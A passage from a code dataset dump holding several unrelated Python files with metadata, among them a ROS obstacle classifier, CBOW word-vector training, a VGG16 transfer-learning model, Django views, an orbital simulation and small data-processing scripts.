background_color='white',\n        # shape of the word cloud (mask image)\n        mask=color_mask,\n        # maximum number of words\n        max_words=2000,\n        # maximum font size\n        max_font_size=60,\n        scale=32\n    )\n    wc.generate_from_frequencies(Counter(tag_dict))\n    image_colors = ImageColorGenerator(color_mask)\n    wc.recolor(color_func=image_colors)\n    wc.to_file(\"wcloud_\" + file_name + \".jpg\")\n\n    # plt.imshow(wc,interpolation=\"bilinear\") # show the word cloud\n    # plt.axis('off') # turn off the axes\n    # plt.show()\n\ndef batchWordCloud(path):\n    path = 'ChannelStatistics'  # note: the path argument is overridden; the directory name is fixed here\n    file_names = get_filenames(path)\n\n    for name in file_names:\n        if name[0] != '#':\n            continue\n\n        showFancySentiment(name)\n\n\nif __name__ == '__main__':\n    # showFancySentiment('#tag_statistics_CCTV中国中央电视台')\n    batchWordCloud('ChannelStatistics')\n    # main()\n","sub_path":"tag_statistics.py","file_name":"tag_statistics.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"195752327","text":"import json\n\ndef source(filePath):\n    target = None\n    with open(filePath) as file:\n        target = json.load(file)\n    if target is None\\\n            or 'templates' not in target:\n        raise ValueError('Config file does not exist or is missing the templates key')\n    async def iterator():\n        startPage: int = int(target.get('start', 1))\n        templates = target['templates']\n        if isinstance(templates, str): templates = [templates]\n        while True:\n            for template in templates:\n                yield template.format(startPage)\n            startPage += 1\n    return iterator","sub_path":"URLGenerator.py","file_name":"URLGenerator.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"20570112","text":"#!/usr/bin/env python\n# import libraries\nimport rospy\nfrom PIL import Image\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as pp\nimport math\nfrom nav_msgs.msg import Odometry\nfrom threading import Timer\nimport matplotlib\nmatplotlib.use('Agg')\nfrom matplotlib import 
pyplot\nimport threading\nfrom math import cos, sin, pi\nfrom sensor_msgs.msg import LaserScan\nfrom geometry_msgs.msg import Twist\nfrom std_msgs.msg import String,Int32,Int32MultiArray,MultiArrayLayout,MultiArrayDimension\nfrom turtlebot3_master.msg import ScanData\n\npositionx = None\npositiony = None\nzq = 0\nwq = 0\nxq = 0\nyq = 0\nalreadyClicked = 0\nstart = False\nJ11 = 0\nJ22 = 0\nclosestObstacle = 0\ncurrentPosition = 0\nclosestObtacleAngle = 0\narrayOfObstacles = list(range(0, 360))\nassumedx = list(range(0, 360))\nassumedy = list(range(0, 360))\n\ndef callback1(dt):\n\n    global closestObstacle\n    global closestObtacleAngle\n    global arrayOfObstacles\n    global assumedx\n    global assumedy\n    global start\n    global alreadyClicked\n    # Looking for the smallest distance\n    closestObstacle = min(dt.ranges)\n    closestObtacleAngle = dt.ranges.index(min(dt.ranges))\n    t0 = +2.0 * (wq * xq + yq * zq)\n    t1 = +1.0 - 2.0 * (xq * xq + yq * yq)\n    roll_x = math.atan2(t0, t1)\n    # Transformation from quaternion to Euler angles\n    t2 = +2.0 * (wq * yq - zq * xq)\n    t2 = +1.0 if t2 > +1.0 else t2\n    t2 = -1.0 if t2 < -1.0 else t2\n    pitch_y = math.asin(t2)\n\n    t3 = +2.0 * (wq * zq + xq * yq)\n    t4 = +1.0 - 2.0 * (yq * yq + zq * zq)\n    yaw_z = math.atan2(t3, t4)\n    changedToAngles = (180 * yaw_z)/(math.pi)\n    x = (407/2) + -(1) * ((407 - 0) / (10 - (-10)))\n\n    for distance in range(len(dt.ranges)):\n    \t# We iterate through every element of the ranges array and transform the values to find the assumed x and y position of every obstacle\n    \tarrayOfObstacles[distance] = dt.ranges[distance]\n    \t# Calculating the angle under which the obstacle lies, taking into consideration both the rotation and the scanner angle\n    \tangle = (math.radians(360 - distance - changedToAngles))\n    \tradius = dt.ranges[distance] * 20\n    \t# Calculating the assumed x and y for the obstacle\n    \tx = J11 + (radius * cos(angle))\n    \ty = J22 + (radius * sin(angle))\n    \tassumedx[distance] = x\n    \tassumedy[distance] = y\n    # Cleaning the arrays\n    if(len(arrayOfObstacles) > 360):\n    \tarrayOfObstacles = []\n    \tassumedx = []\n    \tassumedy = []\n\ndef callback(msg):\n\tglobal positionx\n\tglobal positiony\n\tglobal zq\n\tglobal wq\n\tglobal xq\n\tglobal yq\n\tpositionx = msg.pose.pose.position.x\n\tpositiony = msg.pose.pose.position.y\n\tglobal J11\n\tglobal J22\n\t# Calculating the current position of the robot\n\tJ11 = (407/2) + -(positionx) * ((407 - 0) / (10 - (-10)))\n\tJ11 = 407 - J11\n\tJ22 = (407/2) + -(positiony) * ((407 - 0) / (10 - (-10)))\n\t# Getting the current orientation of the robot\n\tzq = msg.pose.pose.orientation.z\n\twq = msg.pose.pose.orientation.w\n\tyq = msg.pose.pose.orientation.y\n\txq = msg.pose.pose.orientation.x\n\treturn J11, J22\n\ndef cutCirle():\n\t# Opening the map\n\tmatrix = cv2.imread(\"/home/harumanager/catkin_ws/src/maps/supermap1.pgm\", cv2.IMREAD_COLOR)\n\t# Cutting the picture\n\tmatrix = matrix[200:607, 0:407]\n\t# Displaying the robot coordinates\n\tnewCoorinatex = int(J22)\n\tnewCoorinatey = int(J11)\n\tmatrix[newCoorinatex,newCoorinatey] = [254, 50, 50]\n\t# Applying the mask\n\tmask = sector_mask(matrix.shape,(J22,J11,),71.225,(0,360))\n\tmatrix[~mask] = 125\n\tn = np.array(matrix)\n\t# Getting the number of white and black pixels\n\tnumber_of_white_pix = np.sum(matrix == 254)\n\tnumber_of_black_pix = np.sum(matrix == [0,0,0])\n\tobstacleType = None\n\tdistance_array = []\n\tangle_array = []\n\t# Assigning the coordinates of 
the black pixels to the array\n\tif(number_of_black_pix > 0):\n\t\tycoords, xcoords = np.where((n[:, :, 0:3] == [0,0,0]).all(2))\n\t\tsizeArray = len(xcoords)\n\t\tobstacleTypeArray = []\n\t\t# Iterating through all 360 values of the scanner reading\n\t\tfor values in range(360):\n\t\t\tobstacleType = None\n\t\t\tfor xy in range(len(xcoords)):\n\t\t\t\t# If the value is infinite there is no obstacle at this angle\n\t\t\t\tif(math.isinf(arrayOfObstacles[values]) == True):\n\t\t\t\t\tobstacleType = 2\n\t\t\t\t\tobstacleTypeArray.append(obstacleType)\n\t\t\t\t\tbreak\n\n\t\t\t\t# Checking if the assumed value lies within a 3% error margin of the black pixel values from the cut piece of the map\n\t\t\t\tif (assumedx[values] - (assumedx[values] * 0.03) <= xcoords[xy] <= assumedx[values] + (assumedx[values] * 0.03)):\n\t\t\t\t\tindexxy = xy\n\t\t\t\t\t# Checking the same condition for the y coordinate\n\t\t\t\t\tif (assumedy[values] - (assumedy[values] * 0.03) <= ycoords[indexxy] <= assumedy[values] + (assumedy[values] * 0.03)):\n\t\t\t\t\t\t# Obstacle exists both on the map and in the simulation\n\t\t\t\t\t\tobstacleType = 1\n\t\t\t\t\t\tobstacleTypeArray.append(obstacleType)\n\t\t\t\t\t\tbreak\n\n\t\t\t\t\t# Obstacle doesn't exist on the map\n\t\t\t\t\telse:\n\t\t\t\t\t\tif(xy == len(xcoords)-1):\n\t\t\t\t\t\t\tobstacleType = 0\n\t\t\t\t\t\t\tobstacleTypeArray.append(obstacleType)\n\n\t\t\t\telse:\n\t\t\t\t\tif(xy == len(xcoords)-1):\n\t\t\t\t\t\tobstacleType = 0\n\t\t\t\t\t\tobstacleTypeArray.append(obstacleType)\n\n\t# There are no black pixels in the cut piece of the map\n\telse:\n\t\tif (math.isinf(closestObstacle) == True):\n\t\t\tobstacleType = 2\n\n\t\telif (math.isinf(closestObstacle) == False):\n\t\t\tobstacleType = 0\n\t\t# Publish one type per scan angle so that obstacleTypeArray is also defined in this branch\n\t\tobstacleTypeArray = [obstacleType] * 360\n\n\tAnglesObstacles = list(range(1, 360))\n\trate = rospy.Rate(10)\n\t# Publishing the message\n\tscanDataMsg = ScanData()\n\tscanDataMsg.angles = AnglesObstacles\n\tscanDataMsg.ranges = arrayOfObstacles\n\tscanDataMsg.type = obstacleTypeArray\n\tpub.publish(scanDataMsg)\n\tTimer(0.01, cutCirle).start()\n\ndef point_on_circle():\n\n    # center of circle, angle in degrees and radius of circle\n    center = [J22, J11]\n    angle = (math.radians(closestObtacleAngle - 90))\n    radius = closestObstacle * 20.35\n    x = J11 + (radius * cos(angle))\n    y = J22 + (radius * sin(angle))\n\n    return x,y\n\ndef sector_mask(shape,centre,radius,angle_range):\n\n    # Cutting the piece of the map which resembles the scanner range\n    x,y = np.ogrid[:shape[0],:shape[1]]\n    cx,cy = centre\n    tmin,tmax = np.deg2rad(angle_range)\n    if tmax < tmin:\n        tmax += 2*np.pi\n    r2 = (x-cx)*(x-cx) + (y-cy)*(y-cy)\n    theta = np.arctan2(x-cx,y-cy) - tmin\n    theta %= (2*np.pi)\n    circmask = r2 <= radius*radius\n    anglemask = theta <= (tmax-tmin)\n    return circmask*anglemask\n\ndef talker():\n    pub = rospy.Publisher('chatter', String, queue_size=10)\n    rospy.init_node('talker', anonymous=True)\n    rate = rospy.Rate(10) # 10hz\n    while not rospy.is_shutdown():\n        hello_str = \"hello world %s\" % rospy.get_time()\n        rospy.loginfo(hello_str)\n        pub.publish(hello_str)\n        rate.sleep()\n\nif __name__ == '__main__':\n\t#start = False\n\trospy.init_node('ObstacleType')\n\tpub = rospy.Publisher(\"scan_eval\", ScanData, queue_size=10)\n\todom_sub = rospy.Subscriber('/odom', Odometry, callback)\n\tsub = rospy.Subscriber(\"/scan\", LaserScan, callback1)\n\tstartingx = 280\n\tstartingy = 
290\t\n\tcutCirle()\t\n\tpoint_on_circle()\t\n\trospy.spin()\n\t\n","sub_path":"ROB10-main/obstacle-avoidance-turtlebot/src/masters_avodiance.py","file_name":"masters_avodiance.py","file_ext":"py","file_size_in_byte":7156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"280708287","text":"import numpy as np\nimport pickle\n\nfrom datasets import ptb\nfrom src.models import CBOW\nfrom src.optimizers import Adam\nfrom src.trainer import Trainer\nfrom src.utils import create_contexts_target, most_sililar, analogy\n\n\ndef train():\n window_size = 5\n hidden_size = 100\n batch_size = 100\n max_epoch = 10\n\n corpus, word_to_id, id_to_word = ptb.load_data('train')\n vocab_size = len(word_to_id)\n\n contexts, target = create_contexts_target(corpus, window_size)\n model = CBOW(vocab_size, hidden_size, window_size, corpus)\n optimizer = Adam()\n trainer = Trainer(model, optimizer)\n\n trainer.fit(contexts, target, max_epoch, batch_size, None)\n trainer.plot()\n\n word_vecs = model.word_vecs\n\n params = {}\n params['word_vecs'] = word_vecs.astype(np.float16)\n params['word_to_id'] = word_to_id\n params['id_to_word'] = id_to_word\n pkl_file = 'cbow_params.pkl'\n\n with open(pkl_file, 'wb') as f:\n pickle.dump(params, f, -1)\n\n\ndef evaluate():\n pkl_file = 'cbow_params.pkl'\n with open(pkl_file, 'rb') as f:\n params = pickle.load(f)\n\n word_vecs = params['word_vecs']\n word_to_id = params['word_to_id']\n id_to_word = params['id_to_word']\n\n queries = ['you', 'year', 'car', 'toyota']\n for query in queries:\n most_sililar(query, word_to_id, id_to_word, word_vecs)\n\n opt = {\n 'word_to_id': word_to_id,\n 'id_to_word': id_to_word,\n 'word_matrix': word_vecs\n }\n\n print('-'*50)\n analogy('king', 'man', 'queen', **opt)\n analogy('take', 'took', 'go', **opt)\n analogy('car', 'cars', 'child', **opt)\n analogy('good', 'better', 'bad', **opt)\n\n\nif __name__ == '__main__':\n train()\n evaluate()\n","sub_path":"ch_04.py","file_name":"ch_04.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"168236146","text":"from tensorflow.keras.applications.vgg16 import VGG16\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Flatten, Dense\nfrom tensorflow.keras.optimizers import SGD\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.callbacks import ModelCheckpoint, LearningRateScheduler\nfrom configs.config import CFG\nfrom model.base_model import BaseModel\nimport os\nfrom model import lr_scheduler\n\n\nclass VGGSPA(BaseModel):\n def __init__(self, config):\n super().__init__(config)\n self.base_model = VGG16(include_top=False, input_shape=self.config.model.input)\n self.batch_size = self.config.train.batch_size\n self.model = None\n self.opt = None\n self.epochs = self.config.train.epochs\n self.steps_per_epoch = 0\n\n self.image_size = self.config.train.image_size\n self.training_generator = None\n self.validation_generator = None\n self.test_generator = None\n\n def train_generator(self):\n \"\"\"Instantiate the generator object that feeds the train images to the train cycle\"\"\"\n # Data augmentation\n training_data_generator = ImageDataGenerator(\n rescale=self.config.train.preprocess.rescale,\n shear_range=self.config.train.preprocess.shear_range,\n zoom_range=self.config.train.preprocess.zoom_range,\n horizontal_flip=self.config.train.preprocess.horizontal_flip)\n\n 
self.training_generator = training_data_generator.flow_from_directory(\n self.config.data.path.train_path,\n target_size=(self.config.train.image_size, self.config.train.image_size),\n batch_size=self.batch_size,\n classes=os.listdir(self.config.data.path.train_path))\n\n def valid_generator(self):\n \"\"\"Instantiates the generator object to feed the validation images to the train cycle\"\"\"\n validation_data_generator = ImageDataGenerator(rescale=self.config.train.preprocess.rescale)\n\n self.validation_generator = validation_data_generator.flow_from_directory(\n self.config.data.path.valid_path,\n target_size=(self.config.train.image_size, self.config.train.image_size),\n batch_size=self.batch_size,\n classes=os.listdir(self.config.data.path.train_path))\n\n def t_generator(self):\n \"\"\"Instantiates the generator object that feeds the test images to the evaluate method\"\"\"\n test_data_generator = ImageDataGenerator(rescale=self.config.train.preprocess.rescale)\n\n self.test_generator = test_data_generator.flow_from_directory(self.config.data.path.test_path,\n target_size=(self.config.train.image_size,\n self.config.train.image_size),\n batch_size=1, class_mode=None, shuffle=True)\n\n def build(self):\n for layer in self.base_model.layers:\n layer.trainable = False\n\n # add new classifier layers\n flatten1 = Flatten()(self.base_model.layers[-1].output)\n class1 = Dense(self.config.model.dense1.units, activation=self.config.model.dense1.activation,\n kernel_initializer=self.config.model.dense1.kernel_initializer)(flatten1)\n output = Dense(self.config.model.output.units, activation=self.config.model.output.activation)(class1)\n # define new model\n self.model = Model(inputs=self.base_model.inputs, outputs=output)\n\n def train(self, args):\n self.opt = SGD(lr=self.config.train.optimizer.lr, momentum=self.config.train.optimizer.momentum)\n self.model.compile(loss=self.config.train.loss, metrics=self.config.train.metrics, optimizer=self.opt)\n modelCheckpoint = ModelCheckpoint(os.path.join(args.ckpt_path, self.config.model.output.model_filename),\n monitor='val_accuracy',\n verbose=1, save_best_only=True, mode='max', period=10)\n if args.lrs == 'stepdecay':\n schedule = lr_scheduler.StepDecay(initAlpha=0.001, factor=0.25, dropEvery=10)\n model_history = self.model.fit_generator(self.training_generator, steps_per_epoch=len(\n self.training_generator.filenames) // self.batch_size,\n epochs=self.epochs, validation_data=self.validation_generator,\n validation_steps=len(\n self.validation_generator.filenames) // self.batch_size,\n callbacks=[modelCheckpoint, LearningRateScheduler(schedule)],\n verbose=self.config.train.verbose)\n if args.plot:\n schedule.plot(self.epochs)\n elif args.lrs == 'linear':\n linear_schedule = lr_scheduler.PolinomialDecay(maxEpochs=self.epochs, initAlpha=0.001, power=1)\n model_history = self.model.fit_generator(self.training_generator, steps_per_epoch=len(\n self.training_generator.filenames) // self.batch_size,\n epochs=self.epochs, validation_data=self.validation_generator,\n validation_steps=len(\n self.validation_generator.filenames) // self.batch_size,\n callbacks=[modelCheckpoint, LearningRateScheduler(linear_schedule)],\n verbose=self.config.train.verbose)\n if args.plot:\n linear_schedule.plot(self.epochs)\n\n elif args.lrs == 'polinomial':\n polinomial_schedule = lr_scheduler.PolinomialDecay(maxEpochs=self.epochs, initAlpha=0.001, power=5)\n\n model_history = self.model.fit_generator(self.training_generator, steps_per_epoch=len(\n 
self.training_generator.filenames) // self.batch_size,\n                                                     epochs=self.epochs, validation_data=self.validation_generator,\n                                                     validation_steps=len(\n                                                         self.validation_generator.filenames) // self.batch_size,\n                                                     callbacks=[modelCheckpoint,\n                                                                LearningRateScheduler(polinomial_schedule)],\n                                                     verbose=self.config.train.verbose)\n            if args.plot:\n                polinomial_schedule.plot(self.epochs)\n\n        return model_history.history['loss'], model_history.history['val_loss']\n\n    def evaluate(self):\n        pass\n\n","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"230042357","text":"from django.shortcuts import render\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom rest_framework import status\nimport requests\nfrom .models import Order\nimport datetime\n\n# Create your views here.\n\n\ndef query_book(book_id):\n    try:\n        response = requests.get(\n            f'http://catalog-instance1:9000/catalog/info/{book_id}')\n        return response\n    except:\n        raise requests.ConnectionError\n\n\ndef book_exists(status_code):\n    if status_code == 200:\n        return True\n    return False\n\n\ndef book_available_in_stock(number_of_items):\n    print(number_of_items)\n    if number_of_items > 0:\n        return True\n    return False\n\n\ndef decrement_number_of_books(book_id):\n    requests.put(f'http://catalog-instance1:9000/catalog/decrement/{book_id}')\n\n\ndef store_order(book_id):\n    order = Order(book_id=book_id)\n    order.save()\n    return\n\n\n@api_view(['POST'])\ndef purchase_book(request, book_id):\n    '''\n    purchase_book Function:\n    purchase a book with the specified id\n\n\n    Parameter:\n    book_id : book id\n\n    Return:\n    returns a success message along with the purchased book info\n    '''\n\n    try:\n        response = query_book(book_id)\n\n        if book_exists(response.status_code):\n            book = response.json()\n            if book_available_in_stock(book['number_of_items']):\n                decrement_number_of_books(book_id)\n                store_order(book_id)\n                return Response({\n                    \"Message\": \"Book purchased successfully\",\n                    \"book\": book\n                })\n\n            return Response({\n                \"Message\": \"This Book is not available in the stock, sorry!\"\n            }, status=status.HTTP_404_NOT_FOUND)\n\n        return Response({\n            \"Message\": \"This Book is not found\"\n        }, status=status.HTTP_404_NOT_FOUND)\n\n    except requests.ConnectionError:\n        return Response({\n            \"Message\": \"This service is not available right now\"\n        }, status=status.HTTP_503_SERVICE_UNAVAILABLE)\n","sub_path":"Order-Server/order_server/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"480532275","text":"from django.shortcuts import render\n\n\ndef count_smt_in_text(request):\n\n    what_count = {\n        'letter': letter_count,\n        'word': word_count,\n    }\n\n    text = ''\n    response = ''\n    what_count_choice = ''\n\n    if request.POST.get('count'):\n        text = request.POST.get('text')\n        what_count_choice = request.POST.get('what_count')\n\n        count_smt_dict = what_count[what_count_choice](text)\n\n        response = f\"Number of {count_smt_dict['value']} in the text - {count_smt_dict['count']}\"\n        response += f\". Of these, the number of unique ones - {count_smt_dict['uniqwcount']}\" if count_smt_dict['uniqwcount'] else ''\n\n    context = {\n        'text': text,\n        'what_count': what_count_choice,\n        'response': response,\n    }\n\n    return render(request, 'text_manipulation/count_smt.html', context)\n\n\n\n# helper methods\ndef word_count(text: str):\n\n    wcount_dict = {\n        'value': 'words',\n        'count': 0,\n        'uniqwcount': 0,\n    }\n    if text:\n        text = text.replace(\"\\n\", \" \")\n        text = text.replace(\",\", \"\").replace(\".\", \"\").replace(\"?\", \"\").replace(\"!\", \"\")\n        text = text.lower()\n\n        text_arr = text.split(' ')\n        wcount_dict['count'] = len(text_arr)\n        print(list({i for i in text.split(' ')}))\n        wcount_dict['uniqwcount'] = len(list({i for i in text_arr}))\n\n    return wcount_dict\n\ndef letter_count(text: str):\n    lcount_dict = {\n        'value': 'letters',\n        'count': len(text),\n        'uniqwcount': None,\n    }\n    return lcount_dict","sub_path":"main-app/text_manipulation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"82394558","text":"import pandas as pd\r\nimport os\r\n\r\nHeader = [\"GSTIN of supplier\",\"Trade/Legal name of the Supplier\",\"Invoice number\",\"Invoice type\",\"Invoice Date\",\"Invoice Value (₹)\",\"Place of supply\",\"Supply Attract Reverse Charge\",\"Rate (%)\",\"Taxable Value (₹)\",\"Integrated Tax (₹)\",\"Central Tax (₹)\",\"State/UT tax (₹)\",\"Cess (₹)\",\"Counter Party Return status\"]\r\ndataframes = []\r\nfor files in os.listdir('Excel Files/'):\r\n\r\n    dfs = pd.read_excel('Excel Files/'+files,sheet_name = \"B2B\")\r\n    temp = pd.DataFrame(dfs[5:])\r\n    dataframes.append(temp)\r\ndata = pd.concat(dataframes)\r\ndata.columns = Header\r\ndata.to_csv('Final_Data.csv',index=False)","sub_path":"GenerateCombinedFiles.py","file_name":"GenerateCombinedFiles.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"164597412","text":"\"\"\"\nUnit tests for the complex arithmetic equations\n\"\"\"\n\nimport unittest\n\nfrom packy.arithmetic.complex import LinearEquation, QuadraticEquation\n\n\nclass ComplexTest(unittest.TestCase):\n\n    def test_linear_equation(self):\n        eq = LinearEquation(2, 1)\n        self.assertEqual(eq.get_y(2), 5, \"linear equation get_y() not working\")\n        self.assertEqual(eq.next_y(), 3, \"linear equation next_y() not working\")\n        self.assertEqual(eq.next_y(), 5, \"linear equation next_y() not working\")\n\n    def test_quadratic_equation(self):\n        eq = QuadraticEquation(1, 2, 1)\n        self.assertEqual(eq.get_y(2), 9, \"quadratic equation get_y() not working\")\n        self.assertEqual(eq.next_y(), 4, \"quadratic equation next_y() not working\")\n        self.assertEqual(eq.next_y(), 9, \"quadratic equation next_y() not working\")\n\n\nif __name__ == '__main__':\n    unittest.main()\n\n","sub_path":"packy/arithmetic/test/test_complex.py","file_name":"test_complex.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"311497604","text":"\n\"\"\"Test orbital dynamics with a solar system much like our own...\"\"\"\n\nfrom astropy import units as u\n\nimport exoechopy as eep\nfrom exoechopy.simulate.orbital_physics import true_anomaly_from_mean\n\n\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\n\n# TODO make sure orbits are animated
correctly, Mercury is moving too fast?\n\n\ndef run():\n\n spectral_band = eep.simulate.spectral.JohnsonPhotometricBand('U')\n emission_type = eep.simulate.spectral.SpectralEmitter(spectral_band, magnitude=16)\n\n MyStar = eep.simulate.Star(mass=1*u.M_sun, radius=1.*u.R_sun, spectral_type=emission_type,\n name=\"Solly\", point_color='darkorange')\n\n # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\n\n planet_albedo = eep.simulate.spectral.Albedo(spectral_band, 1.)\n\n # ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ #\n a_M1 = 0.38709893*u.au\n e_M1 = 0.20563069\n i_M1 = 3.38*u.deg # relative to sun equator\n L_M1 = 48.33167*u.deg\n w_M1 = 77.45645*u.deg - L_M1\n M_M1 = true_anomaly_from_mean(252.25084*u.deg - w_M1 - L_M1, e_M1)\n MercurialPlanet = eep.simulate.KeplerianExoplanet(semimajor_axis=a_M1,\n eccentricity=e_M1,\n inclination=i_M1,\n longitude=L_M1,\n periapsis_arg=w_M1,\n initial_anomaly=M_M1,\n albedo=planet_albedo,\n point_color='k', path_color='dimgray',\n name='Mercurial')\n MyStar.add_orbiting_object(MercurialPlanet)\n\n # ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ #\n a_V = 0.72333199*u.au\n e_V = 0.006772\n i_V = 3.86*u.deg # relative to sun equator\n L_V = 76.68069*u.deg\n w_V = 131.53298*u.deg - L_V\n M_V = true_anomaly_from_mean(181.97973*u.deg - w_V - L_V, e_V)\n VenusianPlanet = eep.simulate.KeplerianExoplanet(semimajor_axis=a_V,\n eccentricity=e_V,\n inclination=i_V,\n longitude=L_V,\n periapsis_arg=w_V,\n initial_anomaly=M_V,\n albedo=planet_albedo,\n point_color='orange', path_color='darkgoldenrod',\n name='Venusian')\n MyStar.add_orbiting_object(VenusianPlanet)\n\n # ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ #\n a_E = 1.00000011*u.au\n e_E = 0.01671022\n i_E = 7.155*u.deg # relative to sun equator\n L_E = -11.26064*u.deg\n w_E = 102.94719*u.deg - L_E\n M_E = true_anomaly_from_mean(100.46435*u.deg - w_E - L_E, e_E)\n EarthyPlanet = eep.simulate.KeplerianExoplanet(semimajor_axis=a_E,\n eccentricity=e_E,\n inclination=i_E,\n longitude=L_E,\n periapsis_arg=w_E,\n initial_anomaly=M_E,\n albedo=planet_albedo,\n point_color='b', path_color='lightskyblue',\n name='Earthy')\n MyStar.add_orbiting_object(EarthyPlanet)\n\n # ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ #\n a_M2 = 1.52366231*u.au\n e_M2 = 0.09341233\n i_M2 = 5.65*u.deg # relative to sun equator\n L_M2 = 49.57854*u.deg\n w_M2 = 336.04084*u.deg - L_M2\n M_M2 = true_anomaly_from_mean(355.45332*u.deg - w_M2 - L_M2, e_M2)\n MarsyPlanet = eep.simulate.KeplerianExoplanet(semimajor_axis=a_M2,\n eccentricity=e_M2,\n inclination=i_M2,\n longitude=L_M2,\n periapsis_arg=w_M2,\n initial_anomaly=M_M2,\n albedo=planet_albedo,\n point_color='darkred', path_color='salmon',\n name='Martian')\n MyStar.add_orbiting_object(MarsyPlanet)\n\n\n # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\n\n EarthyPlanet.about_orbit()\n\n # eep.visualize.keplerian_orbit_plot(MercurialPlanet)\n\n eep.visualize.render_3d_planetary_system(MyStar)\n\n eep.visualize.animate_3d_planetary_system(MyStar)\n\n\n# ******************************************************************************************************************** #\n# ************************************************ TEST & DEMO CODE ************************************************ #\n\n\nif __name__ == \"__main__\":\n 
run()\n\n\n","sub_path":"examples/submodules/generate_terran_star_system.py","file_name":"generate_terran_star_system.py","file_ext":"py","file_size_in_byte":5544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"145356966","text":"import os\nfrom confypy import Config\nfrom confypy import Location\n\nyamlConf = '.octobot/config.yaml'\nud = os.path.expanduser('~')\ncwd = os.getcwd()\nuser_config = os.path.join(ud, yamlConf)\nlocal_config = os.path.join(cwd, yamlConf)\n\nenv_keys = [\n 'OCTOBOT_INCOMING_WEBHOOK_URL',\n 'OCTOBOT_USERNAME',\n 'OCTOBOT_CHANNEL',\n 'OCTOBOT_ICON_EMOJI',\n 'OCTOBOT_ALIASES',\n 'OCTOBOT_DEBUG',\n]\n\ndefaults = {\n 'OCTOBOT_INCOMING_WEBHOOK_URL': 'http://example.com',\n 'OCTOBOT_USERNAME': 'octobot',\n 'OCTOBOT_CHANNEL': '#general',\n 'OCTOBOT_ICON_EMOJI': ':octopus:',\n 'OCTOBOT_ALIASES': []\n}\n\n\ndef load_config(overrides):\n config = Config(chain=True, defaults=defaults)\n\n config.locations = [\n Location.from_env_keys(env_keys),\n Location.from_path(user_config),\n Location.from_path(local_config),\n Location.from_dict(overrides),\n ]\n\n return config\n","sub_path":"octobot/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"277890510","text":"import os\nimport sys\nimport subprocess\nimport json\nimport shutil\n\njson_dir = sys.argv[1]\nout_dir = sys.argv[2]\nmoco_path = sys.argv[3]\nmax_len = sys.argv[4]\n\ninst_dict_file = os.path.join(moco_path, 'inst_dict.txt')\nstate_dict_file = os.path.join(moco_path, 'state_dict.txt')\n\nstate_dict = {}\nfor line in open(state_dict_file):\n s = line.strip().split()\n if len(s) == 2:\n token, freq = s\n state_dict[token] = int(freq)\n\ndef process_inst(in_file, out_file, dict_file):\n cmd = ['../bin/irlexer', 'process-inst', in_file, dict_file, dict_file, '../bin/fast', os.path.join(moco_path, 'bpe_codes'), max_len]\n subprocess.run(cmd, stdout=open(out_file, 'w'), stderr=subprocess.STDOUT)\n\ndef to_rawtext(in_file, out_file, vocab=None):\n with open(in_file) as fi, open(out_file, 'w') as fo:\n for line in fi:\n data = json.loads(line)\n tokens = []\n for d in data:\n if tokens:\n tokens.append('')\n if vocab is None:\n tokens += d\n else:\n for t in d:\n if not t:\n continue\n elif t in vocab:\n tokens.append(t)\n elif t[0] in ['a', 'v', 'm']:\n tokens.append('')\n else:\n tokens.append('')\n fo.write(' '.join(tokens) + '\\n')\n\nprocess_inst(os.path.join(json_dir, 'insts.json'), os.path.join(out_dir, 'insts.json'), inst_dict_file)\nto_rawtext(os.path.join(out_dir, 'insts.json'), os.path.join(out_dir, 'insts.txt'))\nto_rawtext(os.path.join(json_dir, 'states.json'), os.path.join(out_dir, 'states.txt'), state_dict)\nshutil.copyfile(os.path.join(json_dir, 'pos.json'), os.path.join(out_dir, 'pos.json'))\n","sub_path":"process-poj-classification-data/5_json_to_rawtext.py","file_name":"5_json_to_rawtext.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"3706579","text":"# -*- coding: utf-8 -*-\n\nimport os, sys\nimport shutil\nimport string\nimport json\nimport 